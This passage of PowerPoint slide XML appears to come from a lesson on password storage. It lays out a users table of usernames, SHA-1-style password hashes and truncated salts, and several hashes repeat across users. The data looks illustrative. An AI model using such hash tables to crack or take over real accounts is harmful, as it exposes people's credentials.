                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>password_hash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>password_salt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>77ba9cd915c8e359d9733edcfe9c61e5aca92afb</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>6WU7FDbLopP...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>410114109270c8ffe4af1706adcad6e29c421f4d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>HwP3tHm2Y5O...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>sarah</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>34ea99829a8df97f54dddc3c747c13c6b34c2a93</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>05FDvybZfyC...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>james</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>410114109270c8ffe4af1706adcad6e29c421f4d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>cU0xDJhCP0T...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>arup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>d9bc17fe6fdf4909187612e5374b74a7d593975e</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>8hz14v3tIcQ...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>allison</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>7c4a8d09ca3762af61e59520943dc26494f8941b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>bJVRluREmFy...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>pumpkin22</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>d9bc17fe6fdf4909187612e5374b74a7d593975e</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>YAecuq609Y5...</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
